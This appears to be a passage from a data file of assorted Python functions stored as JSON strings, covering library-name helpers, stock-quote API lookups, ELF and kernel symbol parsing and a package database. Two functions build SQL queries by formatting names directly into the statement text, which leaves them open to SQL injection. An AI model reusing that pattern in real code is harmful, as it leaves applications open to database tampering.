open(current_libname, \"r\")\n match = re.search(r'GROUP\\s*\\(\\s*(\\S+)\\s+', fd.read(), re.MULTILINE)\n fd.close()\n if match:\n ret = os.path.basename(match.group(1))\n if is_verbose():\n print(\"Using shared library '%s' instead of '%s'.\" % (ret, libname))\n return ret\n return libname", "def flib_name(flib_path):\n raw = cmd('flib', 'view-lib', flib_path)\n info = defaultdict(str)\n for line in raw.splitlines():\n k, v = map(str.strip, line.split(':', 1))\n info[k] = v\n return '%s_%s' % (info['Tag'].replace('/', '_'), info['Name'])", "def find_material(material):\n for libn,tdict in liblist:\n if material in tdict:\n print(libn)", "def extract(self, lib):\n cmd = [self.nm_exe] + self.flags + [lib]\n out = subprocess.check_output(cmd).decode()\n fmt_syms = (self._extract_sym(l)\n for l in out.splitlines() if l.strip())\n # Cast symbol to string.\n final_syms = (repr(s) for s in fmt_syms if self._want_sym(s))\n # Make unique and sort strings.\n tmp_list = list(sorted(set(final_syms)))\n # Cast string back to symbol.\n return util.read_syms_from_list(tmp_list)", "def libraryName(self):\n ret=\"\"\n if self.kind == \"lib\":\n ret = self.name + \"Engine\"\n elif self.kind == \"exe\":\n ret = self.name + \"Exelib\"\n else:\n raise Invalid(\"Invalid kind of component: %s. Supported kinds are 'lib' and 'exe'\" % self.name)\n return ret", "def library2(self,irc,msg,args):\n company = self.pick(self.vPrefix) + \\\n self.pick(self.vMidfix) + \\\n self.pick(self.vPostfix) + \"lib\"\n product = self.pick(self.vBased) + \" \" + \\\n self.pick(self.vProd) + \" \" + \\\n self.pick(self.vVia) + \" \" + \\\n self.pick(self.vLibraryVerbs) + \" \" + \\\n self.pick(self.vLibrary)\n irc.reply(\"%s = %s\" % (company,product))", "def lookup_symbol(symbol):\n\n try:\n res = requests.get(\"https://cloud.iexapis.com/stable/stock/\" +\n f\"{urllib.parse.quote_plus(symbol)}/quote?token={Config.API_KEY}\")\n res.raise_for_status()\n except requests.RequestException:\n return None\n\n try:\n quote = res.json()\n return {\n \"name\": quote[\"companyName\"],\n \"price\": float(quote[\"latestPrice\"]),\n \"symbol\": quote[\"symbol\"],\n }\n except (KeyError, TypeError, ValueError):\n return None", "def library():\n finder = LibraryFinder()\n p = finder.find()\n return p if p else ''", "def get_number_from_symbol(symbol):\n return elements[symbol]['number']", "def instrumentLookup(instrument_df,symbol):\r\n try:\r\n return instrument_df[instrument_df.tradingsymbol==symbol].instrument_token.values[0]\r\n except:\r\n return -1", "def lookup(symbol):\r\n \r\n # format url\r\n url = 'https://query1.finance.yahoo.com/v7/finance/options/{}'.format(symbol)\r\n \r\n # send HTTP request and JSONify\r\n page = requests.get(url, headers={'User-agent': 'Mozilla/5.0'}).json()\r\n if page['optionChain']['result'] == []:\r\n return 1\r\n \r\n # init dictionary\r\n info = {}\r\n \r\n # name\r\n try:\r\n info['name'] = page['optionChain']['result'][0]['quote']['shortName']\r\n except Exception as e:\r\n try:\r\n info['name'] = page['optionChain']['result'][0]['quote']['longName']\r\n except Exception as e:\r\n info['name'] = symbol\r\n \r\n # price\r\n try:\r\n info['price'] = page['optionChain']['result'][0]['quote']['regularMarketPrice']\r\n except Exception as e:\r\n return 2\r\n \r\n # is tradeable\r\n try:\r\n if page['optionChain']['result'][0]['quote']['quoteType'] != 'INDEX':\r\n info['tradeable'] = True\r\n except Exception as e:\r\n pass\r\n\r\n # market status\r\n try:\r\n page = page['optionChain']['result'][0]['quote']['marketState']\r\n if page != 'PRE' or page != 'NORMAL' or page != 'POST':\r\n info['marketState'] = 1\r\n except Exception as e:\r\n return 3\r\n \r\n info['symbol'] = symbol\r\n \r\n # success\r\n return info", "def _GetSymbolNameToFilename(build_directory):\n symbol_extractor.CheckLlvmNmExists()\n path = os.path.join(build_directory, 'obj')\n object_filenames = cyglog_to_orderfile.GetObjectFilenames(path)\n pool = multiprocessing.Pool()\n symbol_names_filename = zip(\n pool.map(symbol_extractor.SymbolNamesFromLlvmBitcodeFile,\n object_filenames),\n object_filenames)\n pool.close()\n result = {}\n for (symbol_names, filename) in symbol_names_filename:\n stripped_filename = filename[len(build_directory):]\n if stripped_filename.startswith('/obj/'):\n stripped_filename = stripped_filename[len('/obj/'):]\n for s in symbol_names:\n result[s] = stripped_filename\n return result", "def parse_symbol_table(data, sections, elf_header):\n if is64bit(elf_header):\n symbol_entry_str = symbol_64_entry_str\n symbol_entry_spec = symbol_64_entry_spec\n else:\n symbol_entry_str = symbol_32_entry_str\n symbol_entry_spec = symbol_32_entry_spec\n entry_len = struct.calcsize(symbol_entry_str)\n \n st_offset = None\n if \".symtab\" in sections:\n section = \".symtab\"\n if \".strtab\" in sections:\n st_offset = sections[\".strtab\"][\"offset\"]\n else:\n st_offset = sections[section][\"offset\"]\n \n elif \".dynsym\" in sections:\n section = \".dynsym\"\n if \".dynstr\" in sections:\n st_offset = sections[\".dynstr\"][\"offset\"]\n else:\n st_offset = sections[section][\"offset\"]\n \n \n if section not in sections:\n return {}, {} \n \n symbols = {}\n imports = {}\n offset = sections[section][\"offset\"]\n size = sections[section][\"size\"]\n index = offset\n while index < offset + size:\n vals = {}\n if len(data) < index+entry_len: \n break\n \n val_data = struct.unpack(symbol_entry_str, data[index:index+entry_len])\n for i, elem in enumerate(symbol_entry_spec):\n vals[elem[0]] = val_data[i]\n \n if st_offset is None:\n symbols[vals[\"name\"]] = vals\n else:\n func_name = get_name_from_string_table(data, st_offset, vals[\"name\"])\n if func_name:\n vals.pop(\"name\")\n vals[\"info\"] = get_symbol_info(vals[\"info\"])\n vals[\"shndx\"] = get_symbol_shndx(vals[\"shndx\"])\n \n if vals[\"info\"] == \"UNDEFINED\" and vals[\"value\"] == 0:\n tmp_name = func_name\n import_name = \"Unknown\"\n if \"@@\" in func_name:\n i = tmp_name.find(\"@@\")\n func_name = tmp_name[:i]\n import_name = tmp_name[i:].strip(\"@@\") \n if import_name not in imports:\n imports[import_name] = {}\n imports[import_name][func_name] = vals\n symbols[func_name] = vals\n \n index += entry_len \n \n return symbols, imports", "def instrumentLookup(instrument_df,symbol):\n try:\n return instrument_df[instrument_df.tradingsymbol==symbol].instrument_token.values[0]\n except:\n return -1", "def getSymbolMap():\n name = os.path.join(os.path.dirname(__file__), 'nasdaq_nasdaqcom.csv')\n symbols = TickerSymbols(name)\n return symbols.getNameToTicker()", "def lookup(cls, _db, short_name):\n def _lookup():\n library = get_one(_db, Library, short_name=short_name)\n return library, False\n library, is_new = cls.by_cache_key(_db, short_name, _lookup)\n return library", "def number_to_name(number):\n for name, value in item_dict.items():\n if number == value:\n return name", "def get_library_name(name):\n suffix = get_sharedlib_suffix()\n if not is_windows() and name.startswith(\"lib\"):\n name = name[len(\"lib\"):]\n if suffix and name.endswith(suffix):\n name = name[:-len(suffix)]\n return name", "def _GetSymbol(atom):\n ks = atom.keys()\n if 'sym' in ks:\n return atom['sym']\n\n for k in ks:\n if k not in PROTECTED_KEYS and isinstance(atom[k], list):\n if len(atom[k]) == 3:\n return k\n\n raise ValueError", "def package_name(string):\n return 'USymbol' + convert_name(string, False)", "def lookup(symbol):\n\n # Contact API\n try:\n api_key = app.config[\"API_KEY\"]\n response = requests.get(\n f\"https://cloud-sse.iexapis.com/stable/stock/{urllib.parse.quote_plus(symbol)}/quote?token={api_key}\")\n response.raise_for_status()\n except requests.RequestException:\n return None\n\n # Parse response\n try:\n\n quote = response.json()\n\n return {\n \"name\": quote[\"companyName\"],\n \"price\": float(quote[\"latestPrice\"]),\n \"symbol\": quote[\"symbol\"],\n \"isotime\": datetime.datetime.utcnow().isoformat()\n }\n\n except (KeyError, TypeError, ValueError):\n return None", "def lookup(symbol):\n\n # Contact API\n try:\n api_key = os.environ.get(\"API_KEY\")\n response = requests.get(f\"https://cloud-sse.iexapis.com/stable/stock/{urllib.parse.quote_plus(str(symbol))}/quote?token={api_key}\")\n response.raise_for_status()\n except requests.RequestException:\n flash(\"Please set API_KEY\", 'danger')\n return None\n\n # Parse response\n try:\n quote = response.json()\n return {\n \"name\": quote[\"companyName\"],\n \"price\": float(quote[\"latestPrice\"]),\n \"symbol\": quote[\"symbol\"],\n \"change\": quote[\"change\"],\n \"changePercent\": quote[\"changePercent\"],\n \"volume\": quote[\"volume\"],\n \"week52High\": quote[\"week52High\"],\n \"week52Low\": quote[\"week52Low\"],\n \"open\" :quote[\"open\"],\n \"high\" :quote['high'],\n \"low\" : quote[\"low\"]\n }\n except (KeyError, TypeError, ValueError):\n return None", "def get_symbol(self, name):\n if not self.ksymtab_initialized:\n self._init_ksymtab()\n for match in re.finditer('{0}\\0'.format(name), self.kernel_image[self.ksymtab_strings_offset:]):\n symbol_str_offset = self.ksymtab_strings_offset + match.start()\n if re.match(r'[0-9a-z_]', self.kernel_image[symbol_str_offset - 1:symbol_str_offset]):\n # Symbol string is a substring of another symbol string,\n # e.g. 'use_mm' is a substring of 'unuse_mm'.\n continue\n debug.debug(\"Found the physical offset of the symbol string \"\n \"'{0}': {1:#010x}\".format(name, symbol_str_offset))\n symbol_str_vaddr = symbol_str_offset + self.page_offset\n symbol_str_vaddr_little = pack('<L', symbol_str_vaddr)\n # TODO: save ksymtab_offset in the object variable\n ksymtab_offset = max(0, symbol_str_offset - KSYMTAB_MAX_SIZE) >> 2 << 2 # align to x4\n ksymtab_data = self.kernel_image[ksymtab_offset:ksymtab_offset + KSYMTAB_MAX_SIZE]\n for match in re.finditer(symbol_str_vaddr_little.encode('hex'), ksymtab_data.encode('hex')):\n ksymtab_entry_offset = ksymtab_offset + match.start() / 2 - 4\n symbol_vaddr, = unpack('<L', self.kernel_image[ksymtab_entry_offset:ksymtab_entry_offset + 4])\n debug.debug(\"Requested kernel symbol '{0}' found: {1:#010x}\".format(name, symbol_vaddr))\n return symbol_vaddr\n debug.debug(\"Requested kernel symbol '{0}' not found\".format(name))\n return None", "def lookup(quantity, __check_shortcuts=True):\n code_given = False\n name_given = False\n\n try: # assume integer-like\n code = int(quantity)\n code_given = True\n except:\n name = quantity\n name_given = True\n\n if (code_given):\n if (code in name_given_code.keys()): # code given, grab name\n return name_given_code[code]\n else:\n return None\n\n if (name_given):\n if (__check_shortcuts): # check shortcuts first\n ind = shortcut_lookup(name)\n\n if (ind is not None): # found in shortcuts\n return ind\n\n name = name.lower()\n if (name in code_given_name.keys()): # name give, grab code\n return code_given_name[name]\n else:\n return None\n\n return None", "def get_keyword(package):\n\ttry:\n\t\tsubstr = re.search(r'(\\S+)_(\\S+)', package)\n\t\tif substr:\n\t\t\treturn substr.groups()\n\texcept Exception,e:\n\t\tlog.error(str(e))\n\t\treturn None", "def _chemistryBarcodeTripleInFile(self):\n try:\n bindingKit = self.file[\"/ScanData/RunInfo\"].attrs[\"BindingKit\"]\n sequencingKit = self.file[\"/ScanData/RunInfo\"].attrs[\"SequencingKit\"]\n # version string in bas file looks like \"2.1.1.1.x\", we have to extract\n # the \"2.1\"\n tmp = self.file[\"/PulseData/BaseCalls\"].attrs[\"ChangeListID\"]\n swVersion= \".\".join(tmp.split(\".\")[0:2])\n return (bindingKit, sequencingKit, swVersion)\n except:\n return None", "def _get_lib_info(*, full_name=None, lib_path=None):\n if full_name is None:\n # get it from the lib_path\n try:\n libsdir, charmsdir, importable_charm_name, v_api = lib_path.parts[:-1]\n except ValueError:\n raise _BadLibraryPathError(lib_path)\n if libsdir != \"lib\" or charmsdir != \"charms\" or lib_path.suffix != \".py\":\n raise _BadLibraryPathError(lib_path)\n full_name = \".\".join((charmsdir, importable_charm_name, v_api, lib_path.stem))\n\n else:\n # build the path! convert a lib name with dots to the full path, including lib\n # dir and Python extension.\n # e.g.: charms.mycharm.v4.foo -> lib/charms/mycharm/v4/foo.py\n try:\n charmsdir, importable_charm_name, v_api, libfile = full_name.split(\".\")\n except ValueError:\n raise _BadLibraryNameError(full_name)\n if charmsdir != \"charms\":\n raise _BadLibraryNameError(full_name)\n path = pathlib.Path(\"lib\")\n lib_path = path / charmsdir / importable_charm_name / v_api / (libfile + \".py\")\n\n # charm names in the path can contain '_' to be importable\n # these should be '-', so change them back\n charm_name = create_charm_name_from_importable(importable_charm_name)\n\n if v_api[0] != \"v\" or not v_api[1:].isdigit():\n raise CommandError(\n \"The API version in the library path must be 'vN' where N is an integer.\"\n )\n api_from_path = int(v_api[1:])\n\n lib_name = lib_path.stem\n if not lib_path.exists():\n return LibData(\n lib_id=None,\n api=api_from_path,\n patch=-1,\n content_hash=None,\n content=None,\n full_name=full_name,\n path=lib_path,\n lib_name=lib_name,\n charm_name=charm_name,\n )\n\n # parse the file and extract metadata from it, while hashing\n metadata_fields = (b\"LIBAPI\", b\"LIBPATCH\", b\"LIBID\")\n metadata = dict.fromkeys(metadata_fields)\n hasher = hashlib.sha256()\n with lib_path.open(\"rb\") as fh:\n for line in fh:\n if line.startswith(metadata_fields):\n try:\n field, value = [x.strip() for x in line.split(b\"=\")]\n except ValueError:\n raise CommandError(\n \"Bad metadata line in {!r}: {!r}\".format(str(lib_path), line)\n )\n metadata[field] = value\n else:\n hasher.update(line)\n\n missing = [k.decode(\"ascii\") for k, v in metadata.items() if v is None]\n if missing:\n raise CommandError(\n \"Library {!r} is missing the mandatory metadata fields: {}.\".format(\n str(lib_path), \", \".join(sorted(missing))\n )\n )\n\n bad_api_patch_msg = \"Library {!r} metadata field {} is not zero or a positive integer.\"\n try:\n libapi = _get_positive_int(metadata[b\"LIBAPI\"])\n except ValueError:\n raise CommandError(bad_api_patch_msg.format(str(lib_path), \"LIBAPI\"))\n try:\n libpatch = _get_positive_int(metadata[b\"LIBPATCH\"])\n except ValueError:\n raise CommandError(bad_api_patch_msg.format(str(lib_path), \"LIBPATCH\"))\n\n if libapi == 0 and libpatch == 0:\n raise CommandError(\n \"Library {!r} metadata fields LIBAPI and LIBPATCH cannot both be zero.\".format(\n str(lib_path)\n )\n )\n\n if libapi != api_from_path:\n raise CommandError(\n \"Library {!r} metadata field LIBAPI is different from the version in the path.\".format(\n str(lib_path)\n )\n )\n\n bad_libid_msg = \"Library {!r} metadata field LIBID must be a non-empty ASCII string.\"\n try:\n libid = ast.literal_eval(metadata[b\"LIBID\"].decode(\"ascii\"))\n except (ValueError, UnicodeDecodeError):\n raise CommandError(bad_libid_msg.format(str(lib_path)))\n if not libid or not isinstance(libid, str):\n raise CommandError(bad_libid_msg.format(str(lib_path)))\n\n content_hash = hasher.hexdigest()\n content = lib_path.read_text()\n\n return LibData(\n lib_id=libid,\n api=libapi,\n patch=libpatch,\n content_hash=content_hash,\n content=content,\n full_name=full_name,\n path=lib_path,\n lib_name=lib_name,\n charm_name=charm_name,\n )", "def examineLoadLibrary(lib):\n from PyJobTransformsCore.envutil import examine_library\n\n # turn module name into library name\n if not lib.startswith('lib') and not lib.endswith('.so'):\n lib = 'lib' + lib + '.so'\n print (\"Examining library \" + lib)\n diagLines = []\n errorAcronym = None\n missingSystemLibs = []\n missingOtherLibs = []\n misLibs = examine_library(lib)\n for l in misLibs:\n if systemLibsRE.search(l):\n missingSystemLibs.append(l)\n else:\n missingOtherLibs.append(l)\n if missingSystemLibs:\n if len(missingSystemLibs) == 1: libWord = 'library'\n else: libWord = 'libraries'\n diagLines.append( 'Site problem: Missing system %s: %s' % (libWord, ','.join(missingSystemLibs)) )\n if not errorAcronym: errorAcronym = \"ATH_SITE_SYSLIBS\"\n\n if missingOtherLibs:\n if len(missingOtherLibs) == 1: libWord = 'library'\n else: libWord = 'libraries'\n diagLines.append( 'Can not find %s: %s Please check software installation.' % (libWord,','.join(missingOtherLibs)) )\n if not errorAcronym: errorAcronym = \"ATH_SITE_LIBS\"\n return (errorAcronym,os.linesep.join(diagLines))", "def _parseKeyNames(lib):\n _keyNames = {}\n for attr in dir(lib): # from the modules variables\n if attr[:6] == 'TCODK_': # get the K_* constants\n _keyNames[getattr(lib, attr)] = attr[6:] # and make CODE=NAME pairs\n return _keyNames", "def symbol(self, **kw):\n if not kw:\n raise ValueError(u\"'symbol' needs keyword arguments\")\n res = self.find_symbols(**kw)\n if len(res)==1:\n return res[0]\n else:\n return res", "def _symbol(self,s):\n return self.symbollist[s%len(self.symbollist)]", "def lookup(symbol):\n\n # Contact API\n try:\n api_key = os.environ.get(\"API_KEY\")\n symbol = urllib.parse.quote_plus(symbol)\n url = f\"https://cloud-sse.iexapis.com/stable/stock/{symbol}/quote?token={api_key}\"\n response = requests.get(url)\n response.raise_for_status()\n except requests.RequestException:\n return None\n\n # Parse response\n try:\n quote = response.json()\n return {\n \"name\": quote[\"companyName\"],\n \"price\": float(quote[\"latestPrice\"]),\n \"symbol\": quote[\"symbol\"]\n }\n except (KeyError, TypeError, ValueError):\n return None", "def prepareTextLibrary(self, itemId, libId, libData):\n funcName = libData['data']['function']\n libName = libData['data']['main-name']\n\n funcRet = \"\"\n if len(libData['data']['obj']) >= 1:\n funcArgType = \"%s\" % libData['data']['obj'][0]['selected-type']\n funcArg = \"%s\" % libData['data']['obj'][0]['value']\n else:\n funcArg = \"\"\n funcArgType = \"\"\n\n if 'return-value' in libData['data']:\n if libData['data']['return-value'] == 'True':\n funcRet = \"ACTION%s = \" % itemId\n\n if len(funcArg):\n funcArgParsed = self.__parseValue(val=funcArg)\n textItem = \"%s %s #%s\\n%s\\n%s: %s\" % (funcRet, libName, libId, funcName, funcArgType, funcArgParsed)\n else:\n textItem = \"%s %s #%s\\n%s\" % (funcRet, libName, libId, funcName)\n\n return textItem", "def display_library_info():\n print \"in display library info \\n\"\n library_list = model.get_libraries_info(model.db_session, session)\n return render_template('library.html', libraries=library_list)", "def lookup_symbol(self, symbol):\n if symbol is None:\n raise TypeError(\"Cannot lookup asset for symbol of None\")\n\n mapping = self.symbol_ownership_map\n\n # split the symbol into the components, if there are no\n # company/share class parts then share_class_symbol will be empty\n company_symbol, share_class_symbol = split_delimited_symbol(symbol)\n try:\n owners = mapping[company_symbol, share_class_symbol]\n assert owners, 'empty owners list for %r' % symbol\n except KeyError:\n # no equity has ever held this symbol\n raise SymbolNotFound(symbol=symbol)\n\n # exactly one equity has ever held this symbol\n if len(owners) == 1:\n return self.retrieve_asset(owners[0].sid)\n\n options = {self.retrieve_asset(owner.sid) for owner in owners}\n\n # more than one equity has held this ticker, this\n # is ambiguous\n raise MultipleSymbolsFound(symbol=symbol, options=options)", "def lookup (barcode, ID_TYPES=['ISBN', 'UPC','EAN']):\n\n matches = [] # list of {'desc', 'sku', 'type', 'vnd'}\n\n for idtype in ID_TYPES:\n try:\n result = api.item_lookup(barcode, SearchIndex='All', IdType=idtype)\n for item in result.Items.Item:\n if not _is_duplicate(item.ASIN, matches):\n matches.append({'desc': unicode(item.ItemAttributes.Title),\n 'sku': unicode(item.ASIN),\n 'type': idtype,\n 'vnd': 'AMZN:'+AMZLOCALE}) # vendor id\n\n except (errors.InvalidAccount, errors.InvalidClientTokenId, errors.MissingClientTokenId):\n print >>sys.stderr, \"Amazon Product API lookup: bad account credentials\"\n\n except errors.TooManyRequests, toomanyerr:\n print >>sys.stderr, \"Amazon Product API lookup error:\", toomanyerr\n\n except errors.InternalError, awserr:\n print >>sys.stderr, \"Amazon Product API lookup error:\", awserr\n\n except errors.InvalidParameterValue:\n # this simply means the barcode\n # does not exist for the given type,\n # so no need to do anything explicit\n pass\n\n return matches", "def _load_symbol(self, index):\n # Load basic information\n name, dim, type_code = self._api.symbol_info(index)\n n_records, vartype, desc = self._api.symbol_info_x(index)\n\n self._index[index] = name # Record the name\n\n attrs = {\n 'index': index,\n 'name': name,\n 'dim': dim,\n 'type_code': type_code,\n 'records': n_records,\n 'vartype': vartype,\n 'description': desc,\n }\n\n # Assemble a string description of the Symbol's type\n type_str_ = type_str[type_code]\n if type_code == gdxcc.GMS_DT_PAR and dim == 0:\n type_str_ = 'scalar'\n try:\n vartype_str_ = vartype_str[vartype]\n except KeyError: # pragma: no cover\n # Some other vartype is returned that's not described by the GDX\n # API docs\n vartype_str_ = ''\n attrs['type_str'] = '{} {}'.format(vartype_str_, type_str_)\n\n debug(str('Loading #{index} {name}: {dim}-D, {records} records, '\n u'\"{description}\"').format(**attrs))\n\n # Equations and Aliases require limited processing\n if type_code == gdxcc.GMS_DT_EQU:\n info('Loading of GMS_DT_EQU not implemented: {} {} not loaded.'.\n format(index, name))\n self._state[name] = None\n return name, type_code\n elif type_code == gdxcc.GMS_DT_ALIAS:\n parent = desc.replace('Aliased with ', '')\n self._alias[name] = parent\n assert self[parent].attrs['_gdx_type_code'] == gdxcc.GMS_DT_SET\n # Duplicate the variable\n self._variables[name] = self._variables[parent]\n self._state[name] = True\n super(File, self).set_coords(name, inplace=True)\n return name, type_code\n\n # The Symbol is either a Set, Parameter or Variable\n try: # Read the domain, as a list of names\n domain = self._api.symbol_get_domain_x(index)\n debug('domain: {}'.format(domain))\n except Exception: # gdxSymbolGetDomainX fails for the universal set\n assert name == '*'\n domain = []\n\n # Cache the attributes\n attrs['domain'] = domain\n self._state[name] = {'attrs': attrs}\n\n return name, type_code", "def read_package_variable(key):\n module_path = os.path.join(PACKAGE_NAME, '__init__.py')\n with open(module_path) as module:\n for line in module:\n parts = line.strip().split(' ')\n if parts and parts[0] == key:\n return parts[-1].strip(\"'\")\n raise KeyError(\"'{0}' not found in '{1}'\".format(key, module_path))", "def isbn_lookup(isbn):\n base = \"https://www.googleapis.com/books/v1/volumes?q=isbn=\"\n# Unfortunately we can't use the superior \"with spam as eggs\" syntax here...\n search = urlopen(base + isbn + \"&prettyprint=false\")\n lines = search.read()\n search.close()\n for bool_pair in [(\"false\", \"False\"), (\"true\", \"True\")]:\n lines = lines.replace(*bool_pair)\n volume_info = literal_eval(lines)[\"items\"][0][\"volumeInfo\"]\n title = volume_info[\"title\"]\n authors = ', '.join(a for a in volume_info[\"authors\"])\n return \"Title:\\t\\t%s\\nAuthor(s):\\t%s\" % (title, authors)", "def itemnames():\n g = ['KIS_NA_39', 'VII_57', 'MX_48', 'MX_56', 'KIS_NA_42', 'VII_54',\n 'MX_S_48', 'MX_S_52', 'MX_52', 'KIS_NA_45', 'KIS_NA_51', 'MIP_45',\n 'MIP_49', 'MIP_52', 'MIP_plus_48', 'MIP_plus_51', 'MX_42', 'MX_45',\n 'MIP_G_42', 'KIS_42', 'KIS_NA_48']\n return(g)", "def read_package_variable(key):\n module_path = os.path.join(PACKAGE_NAME, '__init__.py')\n with open(module_path) as module:\n for line in module:\n parts = line.strip().split(' ')\n if parts and parts[0] == key:\n return parts[-1].strip(\"'\")\n assert 0, \"'{0}' not found in '{1}'\".format(key, module_path)", "def libraryName(self):\n return _osgAnimation.VertexInfluenceMap_libraryName(self)", "def genLibData(self):\n import mush\n tsMain = string.Template(mush.libGenMain)\n tsIfAltId = string.Template(mush.libGenIfAltId)\n #--Data Records\n for id in ('lib_action','lib_actionCount'):\n glob = self.getRecord('GLOB',id,Glob)\n (glob.type, glob.value) = ('s',0)\n glob.setChanged()\n setAllCode = 'begin lib_setAllGS\\n'\n setNoneCode = 'begin lib_setNoneGS\\n'\n for libId in self.libList:\n (srcId,altId) = self.libMap[libId]\n srcBook = self.srcBooks.get(srcId)[0]\n if not srcBook:\n print '%s: Missing source: %s' % (libId,srcId)\n continue\n #--Global\n glob = self.getRecord('GLOB',libId+'G',Glob)\n (glob.type, glob.value) = ('s',0)\n glob.setChanged()\n #--Script\n scriptId = libId+'LS'\n script = self.getRecord('SCPT',scriptId,Scpt)\n scriptCode = tsMain.substitute(\n libId=libId, srcId=srcId, ifAltId=(\n (altId and tsIfAltId.substitute(libId=libId,altId=altId)) or ''))\n script.setCode(scriptCode)\n script.setChanged()\n #--Book\n srcBook.load(unpack=True)\n book = self.getRecord('BOOK',libId,Book)\n book.model = srcBook.model\n book.title = srcBook.title\n book.icon = srcBook.icon\n book.text = srcBook.text\n book.script = scriptId\n book.setChanged()\n #--Set Scripts\n setAllCode += 'set %sG to 1\\n' % (libId,)\n setNoneCode += 'set %sG to 0\\n' % (libId,)\n #--Set scripts\n for id,code in (('lib_setAllGS',setAllCode),('lib_setNoneGS',setNoneCode)):\n code += ';--Done\\nstopScript %s\\nend\\n' % (id,)\n script = self.getRecord('SCPT',id,Scpt)\n script.setCode(code)\n script.setChanged()", "def read_package_variable(key):\n module_path = os.path.join(PACKAGE_NAME, '__init__.py')\n with open(module_path) as module:\n for line in module:\n parts = line.strip().split(' ')\n if parts and parts[0] == key:\n return parts[-1].strip(\"'\")\n assert False, \"'{0}' not found in '{1}'\".format(key, module_path)", "def getLibraryName():\n return _libsbml.XMLOutputStream_getLibraryName()", "def lib_name(interface: str, simulator: str) -> str:\n\n interface_name = interface.lower()\n supported_interfaces = [\"vpi\", \"vhpi\", \"fli\"]\n if interface_name not in supported_interfaces:\n raise ValueError(\n \"Wrong interface used. Supported: \" + \", \".join(supported_interfaces)\n )\n\n simulator_name = simulator.lower()\n supported_sims = [\n \"icarus\",\n \"questa\",\n \"modelsim\",\n \"ius\",\n \"xcelium\",\n \"vcs\",\n \"ghdl\",\n \"riviera\",\n \"activehdl\",\n \"cvc\",\n ]\n if simulator not in supported_sims:\n raise ValueError(\n \"Wrong simulator name. Supported: \" + \", \".join(supported_sims)\n )\n\n if simulator_name in [\"questa\", \"cvc\"]:\n library_name = \"modelsim\"\n elif simulator_name == \"xcelium\":\n library_name = \"ius\"\n elif simulator_name in [\"riviera\", \"activehdl\"]:\n library_name = \"aldec\"\n else:\n library_name = simulator_name\n\n if library_name == \"icarus\":\n lib_ext = \"\"\n elif os.name == \"nt\":\n lib_ext = \".dll\"\n else:\n lib_ext = \".so\"\n\n # check if compiled with msvc\n if os.path.isfile(os.path.join(libs_dir, \"cocotb.dll\")):\n lib_prefix = \"\"\n else:\n lib_prefix = \"lib\"\n\n return lib_prefix + \"cocotb\" + interface_name + \"_\" + library_name + lib_ext", "def get_libraries(name_only=False):\n\n libs = list()\n\n dtf_db = sqlite3.connect(DTF_DB)\n cur = dtf_db.cursor()\n\n # This just returns the name\n if name_only:\n\n sql = ('SELECT name '\n 'FROM libraries ')\n\n for lib in cur.execute(sql):\n libs.append(lib[0])\n\n # This returns a list of items\n else:\n\n sql = ('SELECT name, version, '\n 'about, author '\n 'FROM libraries '\n 'ORDER BY name')\n\n cur.execute(sql)\n\n while True:\n\n item = dtf.core.item.Item()\n line = cur.fetchone()\n if line is None:\n break\n\n item.type = dtf.core.item.TYPE_LIBRARY\n item.name = line[0]\n item.version = line[1]\n item.about = line[2]\n item.author = line[3]\n\n libs.append(item)\n\n return libs", "def _get_info(self, fullmodname):\n parts = fullmodname.split('.')\n submodname = parts[-1]\n modpath = '/'.join(parts)\n for suffix, is_package in _SEARCH_ORDER:\n relpath = modpath + suffix\n try:\n self.datablocks[relpath]\n except KeyError:\n pass\n else:\n return submodname, is_package, relpath\n msg = ('Can\\'t find module %s in .blend %r' %\n (fullmodname, self.path_entry))\n ##logging.debug(msg)\n raise BlendImportError(msg)", "def find_symbol(self) -> str:\n pattern = struct.pack(\"<HBBBBHQ\", self.event_id, self.version, self.channel, self.level, self.opcode, self.task, self.keyword)\n for start, end in find_segment(self._bv, \".rentries\"):\n offset = self._bv.read(start, end - start).find(pattern)\n if offset == -1:\n continue\n\n symbol = self._bv.get_symbol_at(start + offset)\n if symbol is None:\n continue\n \n return symbol.name\n\n return None", "def find_app(app, symbol_by_name=..., imp=...):\n ...", "def lookup(match):\n word = match.group(0)\n return symtab[unbase(word)] or word", "def __update_library(item):\n\n conn = sqlite3.connect(DTF_DB)\n cur = conn.cursor()\n\n # Remove the line first.\n sql = ('DELETE FROM libraries '\n \"WHERE name='%s'\" % item.name)\n\n cur.execute(sql)\n\n entry = [(item.name, item.version, item.author,\n item.install_name)]\n\n # Update a Library Entry\n sql = ('INSERT INTO libraries (name, version, '\n 'author, install_name)'\n 'VALUES (?, ?, ?, ?)')\n\n cur.executemany(sql, entry)\n conn.commit()\n\n return cur.rowcount", "def lookup(name):", "def lookup(name):", "def find_book(code: str) -> Dict:\n pass", "def iteminfo():\n itemcode = input(\"Enter item code: \")\n if itemcode in FULLINVENTORY:\n printdict = FULLINVENTORY[itemcode]\n for key, value in printdict.items():\n print(\"{}:{}\".format(key, value))\n else:\n print(\"Item not found in inventory\")", "def __item_installed(name, item_type):\n\n if item_type == dtf.core.item.TYPE_MODULE:\n table = \"modules\"\n elif item_type == dtf.core.item.TYPE_LIBRARY:\n table = \"libraries\"\n elif item_type == dtf.core.item.TYPE_BINARY:\n table = \"binaries\"\n elif item_type == dtf.core.item.TYPE_PACKAGE:\n table = \"packages\"\n else:\n raise KeyError\n\n dtf_db = sqlite3.connect(DTF_DB)\n\n cur = dtf_db.cursor()\n\n sql = (\"SELECT id \"\n \"FROM %s \"\n \"WHERE name='%s' \"\n 'LIMIT 1' % (table, name))\n\n cur.execute(sql)\n\n return bool(cur.fetchone() is not None)", "def extract(self, lib):\n cmd = [self.tool] + self.flags + [lib]\n out = subprocess.check_output(cmd).decode()\n dyn_syms = self.get_dynsym_table(out)\n return self.process_syms(dyn_syms)", "def _build_lookup(tree: dict, stdlib_lookup: bool = False) -> None:\n def _apply(item: dict, python_stdlib: set) -> None:\n if item[\"type\"] == \"module\" and item[\"imports\"]:\n package = item[\"fullname\"].partition(\".\")[0]\n for import_module in item[\"imports\"].values():\n import_module[\"lookup\"] = None\n name, level, relative = _get_name_level_relative_import_module(import_module)\n # So we first try to find a module with the expected name in the same directory\n # We look the parent item of the current module\n target = _look_in_package(tree, item[\"path\"], name, level=level)\n if target:\n import_module[\"lookup\"] = target\n else:\n # We now look if a package or module has the same name (within the same package)\n target = find_tree(\n tree,\n lambda x, n, p: (x[\"fullname\"] == n) and (x[\"fullname\"].partition(\".\")[0] == p),\n args=(name, package)\n )\n if target:\n import_module[\"lookup\"] = target[\"path\"]\n elif relative:\n # We haven't found so it might be a symbol imported by a 